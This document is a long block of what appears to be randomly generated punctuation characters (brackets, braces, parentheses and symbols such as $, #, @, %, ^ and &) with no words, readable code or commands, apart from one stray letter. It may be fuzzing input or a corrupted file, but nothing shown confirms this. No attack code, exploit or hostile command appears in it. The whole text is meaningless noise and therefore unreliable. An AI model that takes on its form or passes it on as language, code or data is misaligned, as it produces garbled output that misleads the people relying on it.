$[]]@@+!(_$$([#_%_$#(%!#[+)[_&!_*]+!&%}&*[{]*+[!!]+_})[)]))(}_$+{{){[#}^+[{@$[!_^]&@](^!&**^@[^($_{%{++[@[@%^[#(*[+([{}+[{%#+}{_+(%#*[&^&!)*_*+[#&)
_}_^$%#(&+_!#$($*^)@(#%}+^($**][}){+(#{}*&^!(@#&][&*$#!{_!*%$)*(&@]^_*+^^#$}^{}(
+)%&!)^{^$*{!$$[+{])%_^^%!*&@[%#*+##{#^+^(_])$(]_!{*+_)#]}%]^&*{)(+$!_#[*^)[@&@+
^&[(__+_#})_*))#%#!)(]@%{^{#^&][_[+!^&++$++_#$*(&$]))@_#+&#{!)[%!^+{%#{+(&$^_)&]
#^+%&&#(#!$}#((*_+&$_![+}+)[!!+*]@^!_#%^)}%+({![]_%@*[+(}@!$%$(@)+(#)%]}}@]#_%$@
_]^*+}!$+]{{*[{{]%$^)[]_@}#+@*[+@]^%)##[{^^(}_^(@}{*!(+}]#{+(@@@@@{+@(}*(*(%%*!@
)@^$%#+]!&^$*$#%*!+%]#$}^)[@_#%*_!&]&!{$#)$**[[*]+%#!{]^@&]#}^^%(%!*%#{@(*)![*(+
[@(++&]#!{_({%+@)}](&*^*!{$^_{)]}}[^+)&{##*!++_([}^})[]__@!]]&^{^]#}@++{&&{)][[[
}[}}*{)%&]}}+*!$%$[}[@[}%*^{%(^])&&_[*)+%*!%^[*()[)#%_!{]}%@)_&@#$%&(*+)#(]$&!_*
[#){*%+}(+#@*[[_!)^%*%&_#_(%^^$}*(_)(@+(#+*!+*+_^$&($+$&{@[@]{%*!*_{}^%$%^@%%&+}
((^+@{$}(^$$}%()({{^#{]]{{#){&%[!+*[)#%$}*]+}+%{))[((##__$^*%{#_$#(^)){%}*@#(%**
{!]^!@[$)++%@}+]]{]+@#!*]{)+!}!+_@{*@__##]&$)#%{[#![{%+_)&_#**]#$]_#!*@]*&(@})(]
^_+#+$({}@%{^%*#()(^@%$^%%]#}&^)_{%(!$)]{@(#)*@}$&(){*%+](_+}#)(_!@*$@$]$)@%{*%$
$*!{&$$@$@+&)#}}}[{){}([+__+_+](_)@++^%[!*)(+(%}}+%@%!)#$*[$@)$+){_!@*}!]]{{++[}
&@&&(%*#$!^)*_({))]*(^)_^_%_@%(@)]]!_!)&%{[(]*+^+#*#^%)*[]#[[}@$%#{{^#_+[[@+)@+)
+!+__#[]{*)^#%}()]}**$!%[$!*(+[}!)}+(_($@)[#(}*(]#{}{[!{)^@*%*[!!&$$&({%)+{#@]}}
%[)[&(*%[)!)}$&$%@{*#${{%&[#}%@#}@!!*@*)(%(!_*(+]^&{_{_(@}#)[}#%%^*%](_)+*@^{&{@
!{!_*#*[*^(*%_@&_^]^^#!((!*#{#]#(%!{)]#++@@_&}&@+_}+&!#$${^^_(^%_+&)!@*[(])])&+_
[({*%&[%!@&&&_*#_@{_*]@&$+)}(&)+(#]^}{#%&([^^%{^}){$#](^##^%*%&#%#$#}*@#!$#}+]!!
&*+!^%@]^&&++[[$}+@_%)]$_}*@*[%&*$}%&$)*#*%[^@!#@%!)}_![_%(}!$(*_$!*]+)@]}@(@{#^
[}+{[]#@)@^{!(@_]][#}+@&$$#)$*_!_[@**{^(+$$)!!$!](}!)+)^!}](+_{({!{[{}+%)$)@$%$[
$(@^*)@!^^!}#*@]%!^(@{}_!@]&^#({}{](*){+}[_}_($+@}+]@[^*!@]++_%*{^*&+[%*{})%_+&&
@{@!+%*#)@^%#$&}^){[){]}]%*{+)&+)#}*#![())@&#+!*))]%@[$$^+%#}+_!}{#((}@+]]%$)%#%
$]&]{&%^}^(&[}%]#!][}_]+$)${^%[#{)#&$+!^%@%%_]%_*&*!_!]{%+@]&%(*[_^(_[!$]!){!*[+
#$!(}$)#&}^](%!(^_$]*_@!^{]+)_(*^{^{&@(_#(!+!}+%${+_){%!@%++_&)}@}^_)+___*&](!}[
!}(%%@_+}{(]$+@[+%_+$%){#[{[++&)&&^&@&*%&&}@@{^!*^((@]^^{}($}_$_]@[&]%++$[^#]{]^
^{_@%#__%{&%]%_{}++!_]}_][$+@**$^^{_@]){@)}[)!__@_$}%_$}^&!}^@%%+{&^][})@*%(]+([
[!!){[{]]@^_)*!!%@(}}^^}!@$^_${#*_@]]}@}&[*&@%[#*$]_(*%++&$+))}_}+{_!^@&)${%*}{)
@)]+#(}(*_!*]%$@)_][)]_%#{$[!%$_@)]#@]*$$}[#$&+&%$[{*@^$_%$@([$}[%%_(_&!^$#((!(^
{!!+!^+{@$(^^@#(]$($#]_]!%[*#%&_[%]]]*@^(})){!_@_#(*![@}}}$[$]^@_%%}{(&[})!!#}!)
]*%!]!&{%+%@{_}*#_@$)^{{]&&^]{+)@(&+!&@_*@}^@}%(]@$}${_}{#*)!@!*)@%(%$*}(]#&&{&+
}!(*+[)!}}_*_$*@($+]+#+{)%_!{%^!{]^]_{([*))!^&))@&}*!_#^++{)]$#)}(#)%))+)+$})#(+
^{+))%$_%]$&{#+(+!+_&!{^(@]}(@)^$$@@+_$#@^_){%)#*]+][$&(&&&*$_*{*$#(*^&*(_%%^*++
$(&#[{@*#{]_@!(}#${)(!#@+#{^@_^${[+]*(![$(_{$%+(!+(!}[&)((((*^)^@%+![!_{][#%++*_
&[&%)$![(]#$+@@*#_}@]&^@@%+{%(+(+![@))#{$*]{}+{[*!(^_^}]%#]%+[@*_&&+#}^[@[&$_]@}
^[})![*(&{#{&+}(^[)&_%[@*_)(@()!(^)^((({})^}_&]*#[*^[@^+{$&#[{[^%&_&)*{[+!^(&{*@
!)%&}{^&[{{!%{}([+](!*$]#&+++%+($*[({_$}!*^_[%{*(+###^^{(_$}(&}@}}(@)]*%)!&_%^[)
#^+%]#*%{#[%@*@]{$*_$*!}^)}%!{)[))+@[%}$_#@+!_+^!}{{#^!)[+!&($![!@#!^}}{^@*$[]#!
%+{+*)+#@@&([[((@)##%@)!^[$^}(##[}))%%([^*+${)(@[}$[&)%@[$])](!]]{@+)(&*#*@&]+[^
)]{$%$$}^^}&&^]&(%@*!)%[!})&(!_^]%*[&)#&!^+@(#%+@+{*%}^]$!)]{}]{&@]]$]#$_[${*@%{
(^$][(@))(!{(#))%+{{{+#{]{^}&#&+%_@#$%]_&($[!!}]++{%%(#%^(%+*_#^#[*!+&$!]_(@%^_]
$!^#){]%}*_%&@$$[*[&{*@[^}+&)_{+])}][]))%%([[[}[_%}!}[^(}^{{%![@+]][*+{^[}+++![(
)$&]_+#[+}({#+}*{)[+[[([@})+^{^{*%[#{^$@#@]][}{{%&]#_{(%#@${)]]*(}(]$}&&@*&+@](#
_^({%+&^&}((_#${+](+]}@!]}#($${{!}[}}$[}{$}#*((}%[){*%+^}]%+](}&&%][!#$]#[+@&&{_
*}&!)%)%%*{#%%@__[_+%^@&$#@(%*+^$_[)%({*$()(]@*[^_*%}*%]%[%+#_))^@(+$#_+&(_@]$&@
*{}_^@){)*((](@${}[%!)_+!!%^*&${([^+$**^_{*](&({^%![&_$%!]&%%[@]}}%!^^$%@}]@%(!*
+%(*$[&@]*(&@[#{_%!^{)!*!@_]^[(}*]}(!]__{)!**}(!}++[$+([!]*()${){+%_(!&[{*]])#]&
++(_$%_!])$))((_^+[_&++@_$}%*!&}&[%@@_})@%)[{})^{*%@]$]!#%*#%%*%+*&{^*&](^}#*!*_
#_%@([]^*][%!{@)#}[])($[]*()_*[@)^&!%+]%%]&{(^{{%[!!!!_#+!@$]&#(({!_*]]+{#**^*&)
$!$(#[*}+}*__$]!])#$!}]&{]_&#*_[^&}(@*[##^*!{)[+[(}_&@+&+&_(#@[{^*[]}${^*{!@+$^$
#^]$}((&){#@^*}_#]##&@@}^@%)@}{*_{&+[&}}{@+(#+{#]@#^!(%}))}^
{__&(]&#$@&!@((${))_^!][$)%@&%(&_]]^)$@$(]}&$)}}$)(([&{){%{%{^#!%+)*}#@_%{%*#@[@
(%{^}(@$$(^_]($)]_*}&+{^$%!%@$)!#$+(!*^}&(*!(+!$_^#}!*&@_%%{#!$+)]@{}((__$}{[!(@
#[](]$!_#%}&][!!&***(#(@(!@!+)&!&(*$+@#$&]@^_}{((^!@!_[^)##@([&]()[}()+!(+!]#@[&
}[}*(+)[*$*@_}[+&&}**_+]+]+#*$(%)%}[+{)*[{)^#%$]}}(^[{%]%#+[$%&*#][++}&)@^^]&([(
*}]#!_@(!$)@)]&^[_@{+%@($&#{$%@{#!(}(@[^[#__[!]}$+#__*&#^+[#]&%({@_(%}^[]!)$&}]$
&&*&(){[+#%($]^&[($(@$^*[^%](*#[$_*{&{!_#*}$&]&}^}_[}{@*(!@**^!()]#%$[^}&]%}}^%}
^^$*[$+*![%++({&^^_@{[)_([@*#)&_+$&{[{(+[}^_!_^#}++*$$+^)}%]@*#(}%^!)^&)_{)&&@][
@@&}}![+!%{+*#}(#[%*#@)&$(@(_$(]}]{%&]^)&}]_#$@(_})$$^]**&$_%!!##)+(%($([!&$[@$}
(^][&}$]##({[)^$[*}@*)(^]$+($$+]+[]&!&*(}$]&[}{_^}#]*+!!}{__^+${%%!*{*}})&](+^{^
_(*#*^}*}{]++_([##$%&[$%]**#$!}%[)&(](!((*_(&_]][(_!{_@]!%@+_){+)]@&[{[(_$()&)[#
[_(*@*_)([_&&{$)@@[}*&+!(##^+#*$#*)(}{(_]@%!@!)!%%[%%$*$$#(
}!_+*!(^!@[$)_{[@{@}%%@^##$*[#++_(]#}!)!^_%%][[}#{}*[[$#!{*(+)$$}@^{^$$$+]^]$}$%
))@[}@][_((_%@+#_{@)#_*)_*]@%$)!!&!_)&%(}{[#++*}!]{)_$[&([!^[){{{+]%@%[)&@](^}(%
[(@(**__*{$$%}}!#@+@&$!_#!@]@)]{+]&))(^_}[%}#@^&{&_({+_[_()()}__+##+_^+!)%!#[!![
@$*]^]!^}[)#%!]+$@%[^**{*+!*@{}$!]%[(*(]+)+!)}[^{+&{[{%{+$))(]^%(@%]}&_(%@$)_$+)
{($#%_!%!&%!@^$@)}}%[_%@}$@!^*!%$^%+%)!]_[)}*{&%^$$)}+^!_][^}@##%#$}*!&*@%}*{{%#
$**!_$!#&+%@^@@#@%!#__(#[})^(}@{(]$%!@&&@*++)((@#[@]]+@@{*++$$(%}&_[*%#(](_!*}[#
$]#%{%${!!#^!#{}@)]$[%$(&[!&#![&+([@*&@]!}[[*+)%][*}@&!$*]_*+++{!!*!_+%{*++#*^#}
(&!@!+!#($@%+[))*&]*&%)$+_**%^]&%})+]{{{(#{$$[$[[*}$%!]!+(*%*$[[+_(}[}+}*{$)^]&*
!#%^%^(@*&$(!$#$^(}+[&##(})$+#!(*]!]#!^{+%$(&**#^{!+_#}&%^{]$+[!&}^@@+*#_+#)@]$$
]{%]{%&^#!@@)}*)(]_{{@^&)&(@%{@{++}_^{)]#+*)_}@)[&[(^&!}_^&)&@}*((%]][$$#$[&!}$@
!#&^^^}_^&!#%#$![)(]_)^}@[{[)*}[#@(*&#^*%*[_{)([{[(](+{^)@#&_%_&+}@^]$_@(&(_@![)
#_!&_)^[[#$(^#+}@#&[!##_{!^![}@#+))&**$((*^[#]^!%^]_(_#$+^[]{)*+]!%@+@&+$++}((]]
]+)%]){($)$]&*$*]_)({#}))!]{[*+&%[$!#^^%#[($^*$_#^(+)^#{!#}%&*#^]{$)%!](*$$*%+]%
##*_{)^+@(]{_#))+*[+$#^@]+)@!*#%&)[{{{&&*_%}%]*(+]}[#$$)*$$$}!}*{@%!+)^]%(({+}&&
[__$#)(%##*^&{($#+!{})#^&#!%^$*#]+*]*[{[*$*!^{&+#(@@##($!#_^*_+($$_%@[^%^[)$_$&{
%!&#*{*[&}](*&)*)!(%%#$%)[&_&]@{*%+@%@%**}&+]+!*][&^)%_^@@}#%%&]#$${%}_[@(%!+}))
(+[#_&[$#%%__+{+[[([)@[}(&^(_$)#[&!)_##*{__@&!^@+[!_{(*%]!+^](&@&!{]{^^$)(#]%+@@
!{_]#@]&%((+&+*@^@$&&$*{+##_}&_(!%(^}%)#&_^$][]#(^@@(@+&(%![({}[$}_$%*]!)$#{$@[#
(%%]@{$(^{$(*$(*#[^]}%%(@%@)}@[^+)$+![%[(!&+&(_*@^@_$(]_@]_[]#{^@%_!%{+][]$}__!#
*[(!]{*{[^)*(%[%*!(]}%*^_}&[)+(*_+(#((]]}$![@%})[+__!{(#+{%!}#&&^%+*%(*$%}+_#&&*
^@_)}+$(^}(([^$&^((*+*!{%_[{))$$+]%_&%!]#{&!#^^%(^$_#&!^@]&*#]&))$])+$^](^^]))+@
&[($&}#]__%(}&_&()*(&#*&)))(%+]&_(*#^_{%}$@[$#*&]+&%}+^)^{}]*]_@]_&&%@!{%$^}$##$
)*^))+(}#^!(&([$$](*_%)$&(#!__%+)^@)$**%(%_]{)^)+@^!))+$@#&^!&@!^{{)##%}_{%}%[^$
&!]}(}]{#^##}#@[!){*!%^()!{_@{*+%_$+#*{@}]_]^}[]*[#%_!%{*(*({!)+]{})!{[!{[!#}@)}
!*#)[)%(]_&)#%}(_&(*&$}%*$}%))}(%]]@*_}@+%]{@##(!@_+(^%&^]]#_(!#&+@(+^)^*[[!&+&*
^&&+[!_$*)}{]{!}_@_]*__*)]}(]_(]#_!_)#^!!$#**#^](!++*[)(]+(&*(!_^@*#]{!!}^$(_#(_
]!__!^%}}+%)+$]_*#&++]##*&!$]}+^_*!]%])(++})!#&$()##!%^&}][)[_{&]]]@%(}][(]%&*%]
!)@]{##&}#!][%!(^)#)]!#^!%!#_(#%]{_}%({)}%+}]()$$)$(((}*{]!_])$!)%[#{%)!}{%!@#)&
}${}$[@$]&)^@**($][&[{{!)+@#}+[$$(+*[_}&@*^%]}{_[$(#{$[_!)##${[(*(^($@(^_##{#}[]
%(+%{!$}(&$!)])}!]]))]!^)*&^@[%)*%}*(^{{)+_&%_%$$(!$$&({[&&)^_}#!)%$$]*))_!+]]{{
]&@}^&[)&)!}!+_[$)%!!)%($)*!^[^+]&*[))+)^(#&%^+{@][(@%$!^#$^]_[(((}(})*@])@)%&[[
+@]{%%!&}%#[_^_#+)[&%${)[_^@{}]^&&&^@({#$+]]]*#[%)[_{!)%)]![[##*!]_+_(+${[@^}!#(
^^*(}&$]{*()!#]([%$^$[)+)!%{(__!{$$&%}+!*(}%#[[+}]+$$%[]*_{(^@}&@%@+((*!@[%+[+)#
!!_$@@+%@*%]&#+@%%}[*&+!]{+&{}_[#_%^&)]{^[}^&+[}}^&}+*[[{&}[^&{[}!+[(_%)!){(^__(
^%&@%@#!%@$*(*([([&}$_{+**%&%%&^![#]^[_}#[]%@]+[]&[}@{!^}%#%{]^#@}#})@$_}}{{}#]{
*^^[^+}(*&&^{*{[_&[]+^[(**}$^)+**(}]^@^{$*(]%])##+[!(_}+{($[+*@}}*[$*_@){_{_%!#)
$}{@[#!(@+@^}#}(^($#{[()%&*%_#@&$[^[(@}%*$^*_%{)[](@+$*{(+![]{$%%&[(]__+)]^$*_^]
{@[]$*({${#(%&+!)$^(#!}_}}%%@}^]((%{)*${([_+@^+]${)&+%(@)!{[(+*{[__*}*%)$&^$%[$)
_[[%]!(&{({])*][{!%_)@%!%_&)_+(@!*)(]^{)$)^*)*{[+$#(}_]_%_*+^[_)*}(]{)}^+[&[@$&{
#^)%(+@@+#(]**[#^[!($_]^@}+]_$[!(%![$$^!#+&$&#[*{]{$!@{{]!![&^%}[{(_)[@**_]&())^
*+^_)(#!$%#{)^$%(_[^%%*(}&!{@#^@#)](]++%%]$^*)@+]&_^(^@!{%%({[([$]{}%]^*+%^*$(%^
$]_!&++!)*+%*)@#}!)@)_*]&{)[**)*[@[%{(%#)%$!*}&%[^]*_+{(!+&%(_]{#(!#)#!]]}*^+[}+
[{(%!{(*_)_[@^&_+&}@{#+^$^*$[+!+(!@+*[@!+%]_^{[][#^)([}&!_@_#_&_)!+*{$[{#^_$&&+&
#(*+##$%$+}$]%&]&(+!+})$]![]%_]]+}@}^*^[!])@(!_[]+$*}@][!&)%@^_!#%^[@&$(^_(&})%}
(@%@[]+%{)+([!(!@){!^_$]&*(+@#]#]{#)#+][#*#!{^&@[@$%^[!^@#*#@!%!]}$^{&$$*][(%$]^]&]@_&$!$[&&[^*&![$^}$+{_&!@%[%(_)]&^!!*_}
*[^]}{{_@^^!{##%&]$(*_)#+{{[$++]%%+(&^$#!#$^&){!_+!@[_$@_+](%#*#!}[&$&#[{)$+#@+)
%[)[+$$*}#[*${$)[%$!$)*(]([%@%#)!(^#!)[]@]{)}*(#(){^%)@${$#}])@^(@#!}^(&]%_]^@@$
_%+[%&{_(($+[_!#)]+*)[^&*%$*^]!^+{&*%{^(%))[(]}$&})($&@((%#[)_%^]_#{**}+&[**_&[[
](+]&}&#[!#[)^^}@^)+&(&@[&!!)$]*{{$**)^(*[)$#}*)_{@(}&^$#([((*_]&^[!+()(&)(^]#*%
]{(&!!%+#^^!#}@@&+[{@@$^{+%%{{!}**%!*+_#!_([(!*%!@)(!@)[+*!!*_+_[%_}]&)$^{!)+!*]
)_)&*]!{]($&[&*(*##{^%*_#!&}}{)%#}^@#@%$&]($(_@[{##})^(%+%)$(_[#@_)[){@[@)+)#]+^
%{[!])]^]_[%%]{&%#{!*_$[%@}@^]@)!#(&#{(#(_{([+@)%!@(@[$$_$_!@_$&[))*}){+(]}(*^[)
%!@!!!%{[(}{$$@%$}+#)*[^$}({)*{(@*(%]&%#%)&+[+$[]*{%)$$##)+}}!+@!%_$#+#!)[&%{*!@
#&&{{^+[}@$$)]*{!_]#}+^{}*%*$[$)@@^_!*^#*(+}_()$@%$#){_!{_%!${_^!}}!^$#_]$)^]*)]
]{++}(!}}%@*[!{**_+^#^!(+%[^){_&&($!(!!@*){_)[]$($}@[&$!![_#+}[}%#@&+%%}*{[@#&)(
]#!_][+{[^![_([&{})$*({**@+#]+%#(}(^!+@&}]$[{*#++{&^@}&@!)_^{%[})))%%&((#}{#]@*%
@+$%_[(((!&{@^#[$#$@@)_}^){}%_**){^$+)*$+[%!)^%#}&)(@^_}}[+_[}&@#!*$+!&}[_})*[_)
+*({}{*&($(})@]+#_{!!@*%^_$+#($(}%}&[!*}[$^{(*#[#%+}%${}^*[#&{!&@(%^^{+_}@{*[%!!
]_]{}{*&%([){$@*$_$+^&!_()}}[!${^{}@&+}#(*!}@+[*[*(*[%!^*+$]^[)${*@#]_@(+%[)$#!]
}#%}+))(}+$)]@$^*$^$+^[#${*#%]{)@$@(_@%(@#+$]+(({@!#$__&*[[*}[!!+#%%%*(*%}%*}(*+
@^+(}{)#_}^)[$%}+]^}$()@#%#{!*{!(%%[!(&_![_#)_]{((!]%+^(#@[!]%}]%+@[)^@^]#}[{$(_
#_{+[)^}))%%#!*{+[+}&%_$@!_)@$)*{]*[&^!{&}$%([$]+)}#$@#]}&*@$+_($])#_(#+[+@*${*^
!%!!^&*^+{*(*@$((]_$_*+]!{%^$)#__]*+@(__$%&#]@#]%(}$*)#*!(^#_]&&))(+]@%(_{__+%)!
+}&(%*!]][!&)$}([)$@{*{{##+&&@_]%(*+(&@_@)*$}^#[+!@%_$@{&!]+&){{(&{]#&*!@}*[%[@+
}[+]](]_(#*{#*&%_*@$!_)^!*%#^+$*](*{$!{#)]^!}{+)^}][^%(%@({)}&_}+]!}%)}{}&$%$&{^
{+[@#@$)@[])__$^&++]+(%*[#]%#@([#]({#%&%%^+&+(](@}@{@*([$)%%}&$%[+[[(@#]*!][_][}$+[)#)$&**)
)[*#&#(***+@{}^@$$!]&+%&&$]##!@)%@#!}}%%_*%[^)]%{%)%^[}}[+}#+*({_*%*!]({#}+!*_)#
*]([*$@+!_#&@#)}&!(%)}{(+!)]{_^#{+%}{[!^(+@!++$)}{[_@[)$]_)%#*+{)})($**{{]&^*_^%
[)@#!}%!+$&@]@_&+*$[$_(&(}@)()_^([%!^^*_+*}^))#))$!!]$}^(#&#$$[}^_!]){^%[]^&_(**
^!{_!!%])[__^)^%}_^))_($@&$*#&+#)!}[@%+%(&&$$%#++%^%}+$_%%!_(@(+!@$[}^]]!*^}#_{{
*{*&$}$+@[!@&)])[{%]^($]%&#^+&{[[(&^]#{}{}*!{_!*+_&)(]%_&__$@{]_)^#_+{*[+[^($^[@
)(+%_&($]$){!#_%$!)$(^$%)^[_*$$*#{([^$_]%{%%+@]^{)}]+%$^%[)@^+(+}_+)$#)##][&{^$^
#}@}%]+*}{^)*$)^!#)%()#)]$*@*(&}$#%&%]#*%{##^_(*(][$[_$@${#&%)#%%&}]^_%*_@!)&%}_
(%*@!}{%@@)^}#&}&{%__{@^*}#)([+![]&_%@#$%^*)}}{$[@+{^%*(@#[&[!^
(*+%}(^(%!%^!+)!!)[#+_^+{+)]+^$%}{_]^@*@%#*#*%[^){([*[__##$)&{&+_)%$^}_@{^__)%[)
+^_[)!$]^#(+^)%(}!]&__[]^!@}}@{*+!*!_*+%($^$}}[()]_!)(*)[&(+!(([#)+[%^(&}$&_}[{}
(%*!+[+[^[#][}@+!^*^%[}$]@!%%(%[[(#_+{#({@{&[$_%)+$%}@{_+[{}+]![}@]+[#{{]))}+#[*
#]**@$@@+_@)[&[#$+]&]&*$()[#^})()$$#^*+^+%]}^]]&%(#}&(+!%]%]](!#+}$%^_^^@{}+*&}_
_%{#*!{!@]@${%!_$}#_@_#(!(^!#_*#_$&@(@^]_@%)!^&^&{%)({+}}_{%%]%^{&&^@_@&&^[](}(]
_&&^(#_])*)+_]!+&)$%+[](){)+_#*_#[[[%$!^#!!$(_^}(#%({%$!_}$}(()$]!&]}^^)+&+!@%$@
#[_$%!(&[!]@[#]{{*]*(@{+&#_^*[!&)#$_)%[!&!))%@&{[)@![[^[+}&#*$*}+!*&{@(%&}[$^&%_
!!!$+]&@})%%[@[&%!($_)@[}({_[$#}^}@)(%%^^*&&+]%]&$_#^!$!(_$%}*_$_!#!_@^^)${*)%+!
$})&}*}#&([[+^[)*#&%}+[*_+!!&_@%!^##&&{#%@{{*%_+%_{(&#+{[[[*$(%&}(()#)[!%)%@&{[#
+_%(()!!$&(+{{@*(!*!&^#^!(}+{[@^}*%)]#%(!^!]@]!{!{_%!!)#@!_*_#$$})}%&[)[!&*{@]_!
+{%_+]+(+}%#_[)+#%%$+@{([]#^_$#@(}%$]#&^#%%&$%(+()+_}!&}^&*)}]*+]]]*_{%(!][}[_{}
{{(^[!&{!]$&(]]+%^%%{@}_{%@+%+[(^}&@#+^^@^])&!@}])$+$}[)![^%$@_[}(%@$![!+}#@+{&)
^*&_^%+{^{$+$[^_*)*++%^++#%#%*^$*@+${!+%@!}^q(%!({@]%@]]@&#^$[&![(**${)]*^))[$}#
_*^}[}+]{_([#_*)@}{#)@$__!_(^_!{]++$(&)*(}{}_!^*!!++}(_+}$()@%&#{]]+_!$&+#&[{$^$
)^]()@$!(#_!((@&**)*_[@^)#}$%(}&)()+))&[[!%&}{&{[+](#&+_#(({*#]^(#]))#}}@_*{^%+^
%!!%&((&&)@*!*!!^+^#*}#!&!*!+$)$!_%^+&[_+%{})(@[*{$$_)})[!*((_(++_@(${*#](#_]!{{
]]])(^)*%[_*{!@##}[%#(&%%$[#+#{]+}@*+}}!($_}$}^[%_{][%{]@]_[$(_{#&)_![@)^*%{*#&$
}_+#{)@^$]_*$@+@][%^*%+&&[*^[[(*)(#!+]()$#$_@*+__)!&!+*@(&_^*[)${$+^$&]))_({@+[*
_!_&}*$#%_&[@^^%{&&&${}!}{}{]{]}{]]_&%+![+!]_}[$[%[&*(_[_!@(+%_@({*_]+^*(_@##_&{
*&}@&^#}%%!^)!{}))!%[$^_^{@%*#!_[_&&!!^)[]@!{[+!^+([+%+*@[]}*^$$^#$]&$%$}@_[[[}!
$(+$*@!*&^[!{+@[}$#&{}[+&^)}&*[]}*^#]$*]%^}&@)]${)$@@%[*$((_)[*@[%%&^&^}*{#^}&@}
)*)_*^}%+_!{(_!#@@__&]*&_}_+*)(%_@]_@)&]{@(]*+&+@})@(__#}%$($[@)@$@}*}*#)%(((${!
}{[(+#}^{}@((^]%@}({)%&(&[}(!&!!$^+_%^}_{&}!__){+$(}*)[![#%&%^&^__]&[!+{_!)${))*
]]]^_}#%!]_!*^}}!(%{)}($_&@^}]&]^#@)[^@(@)%_($!)[}*!^@#_^]^(^}(_(+%*)}&^][@^]}(}
}{)}][[*]{#(+(@)[_]$$_&[]_&#$)_(&}][&}&%#)@%!)+!]{%*)^%{([!&^%)}+*)%&&(@*$$[{@$&
]^_!_@&@(*$)[*^)*()$({!!_)[((!*]{+[_{*+(#{%]%!(%!(^[{@}(]&$(%^%#^$$*[^#!_(&]$}!{
!^&&^*$!@*{}[*{{{_&(+#&+$%!^_^[($&+#_&@&]}[%}^{{$&!)}_[}(){[)%)$$_#_$}+$^()[%_]_
]])![(]_(*@!)_!&{@__%{$[)]&!*$@()+_][@}&#_*)+%_%^&#${^]$$@+$&]&(%][&[@[^{*%@#+${
}^!_}{)_{$]_@{%*_&^_+{$[__]^&*[&*${{#[$%*&#&{_^$_[)!)%]^+(%}[$_@[$^_*_!{_{#&{()]
}*_)@(&*[@%$$&))()}]!^+[{##@%+**)$)]&_]{^([&*&#$*&(]{([+&&^}*^$!_&%}&}!(}!__$[{&
@*#(*&!_)%&__%#+%^[}!^![}@{}())%]!]!@*+)){!{&*+_}]{}{!^^$)@_)#_(!@^+^%@+(%]!{*+}
*$]$*%}&__!{%)+)@)%&!]}!#&[*&#&+@(^{[$**$^#+)&}#)[][}$}*@_@!%&{{@!_#%]&]_]^%][({
_]*!]}@@+{{]%_($(^^^&#@[[%*]_@[#]{*+{_}!{&)+^@@$#)(){[!])$#[$&@)#+@][]{^](}%)+#%
&[$%*#!}+_@$)_}[+^[^{})!}]_#(&}+[!)!}}*}}[_^((![#*_+[$$[*)(_{+&{@^*}()@@&$]^#+^&
#&@{[^@)(}#[@@&$)]!%@)+*})[{%#{%^*}}{{}]&_$&&$()&#_{!}@(+$%@!*@]*$+&_()&!#}@@{+!
(^&!^*@){%)@@)+*]!@$!#](%&}$_+}+@)}}[+&_+#!*[$$+[(&{!^{)[@_%[])@+)@&&(!!#$&+_+)*
]#&*^}&*}%+#()%()[+}([!$]#{%%+@@@{^^_#*]()^*^%]{+{$(][$])@}]{%]+]+*!!}^![#@*[@)+
+($&}]#^]%%(})${&&!&@@]$_+$[&@%})!*$]{_!_(^+%&_(*(+**%(_})[]$))%+([!{]#**)()([*)
]%+({^)(+#(&*#%#]^^**+^}}+[$_(+&!_{%&{(@&*^[%[_]*]@#@&)$#+!${!_$[#@!)@}}+_^#%{}#
#({@)[&[})[+({_!+^+)]#[#[$_^((^@%}{[^_*$^!]*!*(^{@^}}*{{&*@+}![_#%^%[$&+&{@_%@#}
^^!([)]]^((@!_[#[^#+^+&)#[$#{}$+$]()!__$$#(#!#+[*#)@#_}_]@%#&$!@)]$&]##{*(&}}}[@
$&&]#@($%{(![$((^&*#(^@$}+[%_[}[]!!*%&]![%!*)[[%)[$({%[@[%]_!){!*]$}(@((#}[$^{@(
%{#@!)++)&}$%)_^}[@$_}&)*#^$_)&@}[![+%+{@!$]*}[!!!([[^{}!{&$*)*@**^]_@&_%](*_[*(
^!@(*&_)$[$]@]!^*]*!^)@(*]{@[)]}&+!%[][(#$_[$}!!+{*](((([#@!($(_$@*&^#)&+*%{_&%$
}}&&[(%*]*[_]])$%}^)!#!*&_@(%$@_[_]$*)+)}+*+]#!^)_@#%(&(#}&([[${(+_{{!}#]+$@^]{}
(@_{^%*]##*^!!)(}#{@*&#_}[[$)}[#&[)@}!_*}]#@+&!}{^@!*}{+$#}$]}([{&@+]+++*+[+@+&(
[+${^!)}($[!#$&(^!{^])({%%@{+$)!)[#$@!]({(}&$$&{]](@+@)*$&$[&(!!(^**[*#!){+!!)$$
_{%{}!&+]*&[$}_!@_&{+%{+({(!]}}&_^_!@![)]}##)+!]^_#@%@[#^*+!*^${*)($_#___[*_)+)$
*!}^^+^$++&++*%]#$$$#^*^$!]]^%$%&*%@{#+)&)_](__#^]^&%!+(!#[}@[*_+^+_^)&%!&}#{*#(
{}+${&@{}]]$%[^%%!(![}]}[)@(_%+&[}^#(@[^#&[[(+){+$[)(}*+{&}%{+_#_]#+}([^*}!$)&^!
+!&}^%)%})#&*{]{%}^)^$+})*[&#$*&!]_]{$#)+&[(]$)@(+)&))^_{[_&&@%#{%}}_!++#!@{)}$}
{)(*(]+##$[&({{_][$[*)#[[#!]{&)${&(*[*}%++&**&&%#}^}^]*(#!]*@{)#[_{}$[[#&{#@!%]+
{^{]{@*(%##[#$[$&^][_}]}!&{_!&[^&)[%&+*[+#_*)*+$]**%$]{_%**#+{]+}^_)@{{}]}{[+&@&
#@^@@[*(^)[_#}{]](])!$&{}&*{}&)(**}*[@+}$]][)@}[&[#%$@){[^@%&{+}{{#*]_&[%#&]+$&_
]^{(}+#^][(__#]}(}${)@(*)$(^*^!_!!{(!#{)#_]}[*_{_]](*@&&_]_{{]}]%{$_${!]]+$@][@$
$^&*(+$(*{$$%)%+]#_&#}*+@%[(__$}$(@_]{)&%&$_^%])(]$()(^#]_(!^@{{))&^$_({^)@()#%+
{%&((#)}}[#&$(}]+{^@{+}@]}+#}{(}+]!{*!![)}}+$&_%%*]*(!)$+#^$]}+*#*!(^^*_{)+]%)!*
}^{)[)%])$$&&(]{&{@&#$*{@)%@+!%*#%%((@@[#*_@%($##!&!#$!#{$&^()]]($%]}#(_]!(!_%!_
]$^%^&$#%%())_)!_{}]{@#{&})]$_!]%%]]}}[{[_)}}^((^^[!&*)&+)#&}%*($%+[@$[+}&#@[$(!
@}{[!&_%]{_{*+$#&#*$%!@]}[$]!!^#^&)#}#__[@$#(})(_!((*#){)$#+%_%[{+#_+&@}[}^*%$&#
